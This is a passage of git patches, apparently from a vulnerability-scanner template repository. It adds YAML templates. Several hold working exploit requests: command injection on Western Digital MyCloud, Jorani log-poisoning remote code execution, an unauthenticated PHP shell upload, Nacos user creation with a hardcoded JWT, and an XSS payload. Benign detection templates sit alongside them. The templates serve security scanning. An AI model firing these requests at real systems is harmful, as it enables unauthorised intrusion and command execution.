{{username}} + ------WebKitFormBoundaryoZwyedGcQU4FrcFV + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundaryoZwyedGcQU4FrcFV-- attack: pitchfork payloads: - user: + username: - empireadmin - pass: - - password123 + password: + - 'password123' matchers-condition: and matchers: - - type: regex + - type: word part: body - regex: - - '{"token":".*"}' + words: + - 'access_token' + - 'token_type' - type: word part: header words: - - 'application/json' + - application/json - type: status status: From e3b60e177530aed07659d50531075f6c415c3a91 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 21 Aug 2023 22:55:44 +0530 Subject: [PATCH 0007/1090] Create huatian-oa8000-buffalo-rce.yaml --- .../other/huatian-oa8000-buffalo-rce.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml new file mode 100644 index 0000000000..78ffeb0e17 --- /dev/null +++ b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml @@ -0,0 +1,30 @@ +id: huatian-oa8000-buffalo-rce + +info: + name: Huatian OA8000 Buffalo - Remote Code Execution + author: SleepingBag945 + severity: critical + description: Huatian OA8000 Buffalo found to be vulnerable to Remote Code Execution vulnerability + metadata: + max-request: 2 + verified: true + fofa-query: app="华天动力-OA8000" + tags: huatian,oa,buffalo,rce + +http: + - raw: + - | + GET /OAapp/bfapp/buffalo/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /OAapp/bfapp/buffalo/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: dsl + dsl: + - status_code_1 == 500 && contains(body_1,'Buffalo worker support POST only!') && contains(body_1,'net.buffalo.service.BuffaloWorker.validate') + - status_code_2 == 500 && contains(body_2,'net.buffalo.service.NoSuchServiceException') && contains(body_2,'net.buffalo.service.BuffaloWorker.processRequest') + condition: and From fd3988e19f817bb0cbad14bce53a08b95e9d19a9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 21 Aug 2023 22:58:53 +0530 Subject: [PATCH 0008/1090] lint fix --- http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml index 78ffeb0e17..6fb1322c1f 100644 --- a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml +++ b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml @@ -24,7 +24,7 @@ http: matchers: - type: dsl - dsl: + dsl: - status_code_1 == 500 && contains(body_1,'Buffalo worker support POST only!') && contains(body_1,'net.buffalo.service.BuffaloWorker.validate') - status_code_2 == 500 && contains(body_2,'net.buffalo.service.NoSuchServiceException') && contains(body_2,'net.buffalo.service.BuffaloWorker.processRequest') condition: and From 42d751f26c907085f5e84127efc2e9384f319e81 Mon Sep 17 00:00:00 2001 From: ricardomaia Date: Thu, 24 Aug 2023 20:44:31 -0300 Subject: [PATCH 0009/1090] Misc RDAP WHOIS template --- http/miscellaneous/rdap.yaml | 104 +++++++++++++++++++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 http/miscellaneous/rdap.yaml diff --git a/http/miscellaneous/rdap.yaml b/http/miscellaneous/rdap.yaml new file mode 100644 index 0000000000..e114e01c05 --- /dev/null +++ b/http/miscellaneous/rdap.yaml @@ -0,0 +1,104 @@ +id: rdap + +info: + name: RDAP WHOIS + description: | + RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol + in queries for information about Internet resource records such as domain names, IP addresses, and ASNs. + author: ricardomaia + severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + reference: + - https://www.rdap.net/ + tags: misc,dns,domain,whois,rdap + metadata: + max-request: 1 + +self-contained: true +http: + - method: GET + redirects: true + max-redirects: 3 + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 + Accept: "*/*" + Pragma: no-cache + Cache-Control: no-cache + sec-fetch-mode: navigate + sec-fetch-site: none + sec-fetch-dest: document + path: + - "https://www.rdap.net/domain/{{Host}}" + + extractors: + - type: json + part: body + name: raw + json: + - "." + + - type: regex + part: body + name: domain + group: 1 + regex: + - '^{"objectClassName":"domain","handle":".*?","ldhName":"(.*?)"' + + - type: regex + part: body + name: legalRepresentative + group: 1 + regex: + - 'legalRepresentative":"(.*?)"' + + - type: regex + part: body + name: identifier + group: 1 + regex: + - 'identifier":"(.*?)"' + + - type: regex + part: body + name: email + group: 1 + regex: + - 'email",{},"text","(.*?)"' + + - type: regex + part: body + name: registrationDate + group: 1 + regex: + - '"eventAction":"registration","eventDate":"(.*?)"' + + - type: regex + part: body + name: lastChangeDate + group: 1 + regex: + - '"eventAction":"last changed","eventDate":"(.*?)"' + + - type: regex + part: body + name: expirationDate + group: 1 + regex: + - '"eventAction":"expiration","eventDate":"(.*?)"' + + - type: regex + part: body + name: nameServers + group: 1 + regex: + - 'nameserver","ldhName":"(.*?)"' + + - type: regex + part: body + name: secureDNS + group: 1 + regex: + - '"secureDNS":{"delegationSigned":(.*?)}' From dc3d8dd7a49a1111cdb5f84285fcf8fc68e6e820 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Thu, 24 Aug 2023 20:53:22 -0300 Subject: [PATCH 0010/1090] Update rdap.yaml Fixing reference URL --- http/miscellaneous/rdap.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/miscellaneous/rdap.yaml b/http/miscellaneous/rdap.yaml index e114e01c05..150d0a5bfd 100644 --- a/http/miscellaneous/rdap.yaml +++ b/http/miscellaneous/rdap.yaml @@ -12,7 +12,7 @@ info: cvss-score: 0.0 cwe-id: CWE-200 reference: - - https://www.rdap.net/ + - https://about.rdap.org/ tags: misc,dns,domain,whois,rdap metadata: max-request: 1 From 60b42c2e5b4b9b9d9063b2312b6a12829c1158c3 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Thu, 24 Aug 2023 21:11:37 -0300 Subject: [PATCH 0011/1090] Update rdap.yaml Removing `self-contained: true`. I had initially thought of the template for OSINT. --- http/miscellaneous/rdap.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/miscellaneous/rdap.yaml b/http/miscellaneous/rdap.yaml index 150d0a5bfd..8653977b67 100644 --- a/http/miscellaneous/rdap.yaml +++ b/http/miscellaneous/rdap.yaml @@ -17,7 +17,6 @@ info: metadata: max-request: 1 -self-contained: true http: - method: GET redirects: true From cc059ef04006e23752bf0aa0be1685cdbc32642f Mon Sep 17 00:00:00 2001 From: Lucky-Pulse Date: Fri, 25 Aug 2023 15:28:32 +1200 Subject: [PATCH 0012/1090] Added check to see if script tags within the HTML response have Subresource Integrity implemented via the integrity attribute. --- http/misconfiguration/sri-missing.yaml | 39 ++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/misconfiguration/sri-missing.yaml diff --git a/http/misconfiguration/sri-missing.yaml b/http/misconfiguration/sri-missing.yaml new file mode 100644 index 0000000000..4822c5d404 --- /dev/null +++ b/http/misconfiguration/sri-missing.yaml @@ -0,0 +1,39 @@ +id: sri-missing +info: + name: SRI missing + author: lucky0x0d,PulseSecurity.co.nz + severity: info + tags: javascript,subresource integrity + description: | + Checks if script tags within the HTML response have Subresource Integrity implemented via the integrity attribute + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity + metadata: + max-request: 1 + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + redirects: true + max-redirects: 5 + stop-at-first-match: false + matchers-condition: and + matchers: + - type: xpath + part: body + xpath: + - "//script[contains(@src,'//') and not(contains(translate(@integrity,'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),'^sha'))]" + + - type: word + words: + - "text/html" + part: header + + extractors: + - type: xpath + attribute: src + xpath: + - "//script[contains(@src,'//') and not(contains(translate(@integrity,'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),'^sha'))]" From c937968d3c79cd31d60c34d665b1d27d967efd0b Mon Sep 17 00:00:00 2001 From: shankar acharya <34772838+5hank4r@users.noreply.github.com> Date: Sat, 26 Aug 2023 12:51:33 +0545 Subject: [PATCH 0013/1090] Create JOTFORM_API_KEY --- http/exposures/tokens/JOTFORM_API_KEY | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/exposures/tokens/JOTFORM_API_KEY diff --git a/http/exposures/tokens/JOTFORM_API_KEY b/http/exposures/tokens/JOTFORM_API_KEY new file mode 100644 index 0000000000..fafb7dac40 --- /dev/null +++ b/http/exposures/tokens/JOTFORM_API_KEY @@ -0,0 +1,26 @@ +id: JOTFORM_API_KEY + +info: + name: JOTFORM API KEY + author: Shankar Acharya + severity: High + reference: + - https://www.jotform.com/help/253-how-to-create-a-jotform-api-key/ + + + metadata: + max-request: 1 + verified: "true" + tags: token,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - JOTFORM_API_KEY":"[A-Za-z0-9]+" + From f80f54e5b15e1788accda246b56206d35eab8a33 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 28 Aug 2023 17:59:36 +0530 Subject: [PATCH 0014/1090] Create jorani-panel.yaml --- http/exposed-panels/jorani-panel.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/exposed-panels/jorani-panel.yaml diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml new file mode 100644 index 0000000000..2046566908 --- /dev/null +++ b/http/exposed-panels/jorani-panel.yaml @@ -0,0 +1,39 @@ +id: jorani-panel + +info: + name: Jorani Login Panel - Detect + author: DhiyaneshDK + severity: info + description: Jorani login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + shodan-query: html:"Login - Jorani" + tags: panel,jorani,login + +http: + - method: GET + path: + - '{{BaseURL}}/index.php/session/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Login - Jorani" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' v([0-9.]+) ' From cf48d6229c593c170863221f5c75a7cab6570d07 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 28 Aug 2023 18:02:13 +0530 Subject: [PATCH 0015/1090] detect version all version --- http/exposed-panels/jorani-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index 2046566908..a52feb4e58 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -36,4 +36,4 @@ http: part: body group: 1 regex: - - ' v([0-9.]+) ' + - ' v([0-9.]+)' From 5593ae03c04a9bce821edce5c2d07c904a9a876d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Aug 2023 05:23:56 +0530 Subject: [PATCH 0016/1090] Create CVE-2018-17153.yaml --- http/cves/2018/CVE-2018-17153.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2018/CVE-2018-17153.yaml diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml new file mode 100644 index 0000000000..c21f23b526 --- /dev/null +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-17153 + +info: + name: Western Digital MyCloud NAS - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. + reference: + - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 + - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html + - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-17153 + cwe-id: CWE-287 + epss-score: 0.01264 + cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.favicon.hash:-1074357885 + vendor: western_digital + product: my_cloud_wdbctl0020hwt_firmware + verified: true + tags: cve,cve2018,auth-bypass,rce,wdcloud + +http: + - raw: + - | + POST /web/google_analytics.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}} + Cookie: isAdmin=1; username=admin; + + cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23 + + matchers: + - type: dsl + dsl: + - regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)", body) + - contains(body, "ganalytics") + - status_code == 200 + condition: and From 242ad4b0ca6039e65af7a0e47d1471e92ebdbb03 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Aug 2023 09:38:37 +0530 Subject: [PATCH 0017/1090] Create nacos-create-user.yaml --- .../nacos/nacos-create-user.yaml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/misconfiguration/nacos/nacos-create-user.yaml diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml new file mode 100644 index 0000000000..7796779d37 --- /dev/null +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -0,0 +1,42 @@ +id: nacos-create-user + +info: + name: Alibaba Nacos - Token Create User + author: SleepingBag945 + severity: high + description: | + Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions. + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml + metadata: + shodan-query: title:"Nacos" + verified: true + max-request: 1 + tags: nacos,unauth,instrusive + +http: + - raw: + - | + POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1 + Host: {{Hostname}} + + - | + DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + token: + - eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ + attack: pitchfork + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'create user ok!')" + - "status_code_3 == 200 && contains(body_3,'delete user ok!')" + condition: and From 8feb47bead4b394414fb1f4088e5b9f6821ddf06 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Aug 2023 16:42:34 +0530 Subject: [PATCH 0018/1090] Update CVE-2023-34192.yaml --- http/cves/2023/CVE-2023-34192.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 4fdc9dd6c4..851c5d6d00 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -35,15 +35,18 @@ http: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - "" + - "zimbra" + condition: and - type: word - part: header + part: header_2 words: - text/html - type: status + part: header_2 status: - 200 From 8c2227c4be45c7259db9a1118a8ed366361edbe2 Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Tue, 29 Aug 2023 23:17:46 +0530 Subject: [PATCH 0019/1090] Create CVE-2023-37629.yaml --- http/cves/2023/CVE-2023-37629.yaml | 73 ++++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 http/cves/2023/CVE-2023-37629.yaml diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml new file mode 100644 index 0000000000..e97245551e --- /dev/null +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -0,0 +1,73 @@ +id: CVE-2023-37629 +info: + name: Online Piggery Management System v1.0 - unauthenticated file upload + author: r3Y3r53 + severity: critical + description: | + Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php. + reference: + - https://www.exploit-db.com/exploits/51598 + - https://nvd.nist.gov/vuln/detail/CVE-2023-37629 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-37629 + cwe-id: CWE-434 + metadata: + verified: true + tags: fileupload,unauthenticated,exploitdb + +http: + - raw: + - | + POST /pig/add-pig.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="pigno" + + pig-fms-100 + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="weight" + + 65465 + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="arrived" + + 2023-08-10 + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="gender" + + female + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="status" + + active + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="breed" + + 2 + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="remark" + + 4fwefwe + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="pigphoto"; filename="shell.php" + Content-Type: application/x-php + + + + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="submit" + + + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP-- + + + matchers: + - type: dsl + dsl: + - 'status_code == 302' + - 'contains(content_type, "text/html")' + - 'contains(body, "successfully created")' + condition: and From 23989d540ec5257c514a96b9d85137ea0a993bf0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 30 Aug 2023 08:24:05 +0530 Subject: [PATCH 0020/1090] fix-trail-space --- http/cves/2023/CVE-2023-37629.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index e97245551e..8062131c5c 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/51598 - https://nvd.nist.gov/vuln/detail/CVE-2023-37629 - classification: + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37629 @@ -63,7 +63,6 @@ http: -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP-- - matchers: - type: dsl dsl: From 3518319d956545061dd35c517998b0c22b5d62a2 Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Wed, 30 Aug 2023 09:49:07 +0530 Subject: [PATCH 0021/1090] Update CVE-2023-37629.yaml Updated Author --- http/cves/2023/CVE-2023-37629.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 8062131c5c..ad404c7579 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -1,7 +1,7 @@ id: CVE-2023-37629 info: name: Online Piggery Management System v1.0 - unauthenticated file upload - author: r3Y3r53 + author: Harsh severity: critical description: | Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php. From d191a494b1683833889ef619c4a73fb6ef52cfb0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 30 Aug 2023 22:23:29 +0530 Subject: [PATCH 0022/1090] Create jorani-benjamin-xss.yaml --- .../jorani/jorani-benjamin-xss.yaml | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/vulnerabilities/jorani/jorani-benjamin-xss.yaml diff --git a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml new file mode 100644 index 0000000000..2dd67af05b --- /dev/null +++ b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml @@ -0,0 +1,56 @@ +id: jorani-benjamin-xss + +info: + name: Jorani v1.0.3-2014-2023 Benjamin BALET - Cross-Site Scripting + author: ritikchaddha + severity: high + description: | + The value of the `language request` parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the token session and he can discover sensitive information for the server. + reference: + - https://packetstormsecurity.com/files/174341/Jorani-1.0.3-Cross-Site-Scripting.html + metadata: + max-request: 2 + verified: true + tags: jorani,benjamin,xss + +http: + - raw: + - | + GET /session/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /session/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ennois&login=bbalet&CipheredValue= + + host-redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "_jorani" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="csrf_test_jorani" value="([0-9a-z]+)"' + internal: true From a397e12906bf797b8c80b5405d7f610bf1d38008 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 30 Aug 2023 23:01:52 +0530 Subject: [PATCH 0023/1090] CVE-2023-26469 --- http/cves/2023/CVE-2023-26469.yaml | 59 ++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/cves/2023/CVE-2023-26469.yaml diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml new file mode 100644 index 0000000000..761afa5189 --- /dev/null +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-26469 + +info: + name: Jorani - Remote Code Execution + author: pussycat0x + severity: critical + description: | + Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-26469 + - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py + metadata: + max-request: 3 + shodan-query: http.title:"jorani" + verified: true + tags: cve,cve2023,jorani,rce + +variables: + cmd: "id" + payload: "" + +http: + - raw: + - | + GET /session/login HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + POST /session/login HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword + + - | + GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + X-REQUESTED-WITH: XMLHttpRequest + OYHTUCUZITWV: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)' + + extractors: + - type: regex + part: body_1 + group: 1 + internal: true + name: csrf + regex: + - 'name="csrf_test_jorani" value="(.*?)"' \ No newline at end of file From 12c478a2c80c0cc3f64f16dbfa6d3fe77faf4b30 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 31 Aug 2023 01:31:43 +0530 Subject: [PATCH 0024/1090] minor update --- http/cves/2023/CVE-2023-26469.yaml | 33 ++++++++++++++++++++---------- 1 file changed, 22 insertions(+), 11 deletions(-) diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index 761afa5189..865706cb4f 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -1,7 +1,7 @@ id: CVE-2023-26469 info: - name: Jorani - Remote Code Execution + name: Jorani 1.0.0 - Remote Code Execution author: pussycat0x severity: critical description: | @@ -9,27 +9,34 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-26469 - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py + - https://github.com/advisories/GHSA-7r9h-9r47-7vjj + - http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-22 + epss-score: 0.22328 + cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: http.title:"jorani" + shodan-query: http.favicon.hash:-2032163853 verified: true - tags: cve,cve2023,jorani,rce + tags: cve,cve2023,jorani,rce,packetstorm variables: cmd: "id" - payload: "" + payload: "" + header: "{{to_upper(rand_base(12))}}" http: - raw: - | GET /session/login HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - | POST /session/login HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword @@ -37,23 +44,27 @@ http: - | GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate X-REQUESTED-WITH: XMLHttpRequest - OYHTUCUZITWV: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}} + {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}} cookie-reuse: true matchers-condition: and matchers: - type: regex - part: body + part: body_3 regex: - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)' + - type: status + part: header_3 + status: + - 401 + extractors: - type: regex - part: body_1 + part: body group: 1 internal: true name: csrf regex: - - 'name="csrf_test_jorani" value="(.*?)"' \ No newline at end of file + - 'name="csrf_test_jorani" value="(.*?)"' From 51731aba50e9383ffbbd8b49dd0bd846bbee1029 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 04:02:10 +0000 Subject: [PATCH 0025/1090] Auto WordPress Plugins Update [Thu Aug 31 04:02:10 UTC 2023] :robot: --- .../wordpress/plugins/disable-comments.txt | 2 +- helpers/wordpress/plugins/jetpack-boost.txt | 2 +- .../plugins/limit-login-attempts-reloaded.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- .../plugins/woo-checkout-field-editor-pro.txt | 2 +- helpers/wordpress/plugins/wp-google-maps.txt | 2 +- helpers/wordpress/plugins/wp-mail-smtp.txt | 2 +- .../plugins/wp-reviews-plugin-for-google.txt | 1 + helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- .../plugins/wp-reviews-plugin-for-google.yaml | 49 +++++++++++++++++++ 11 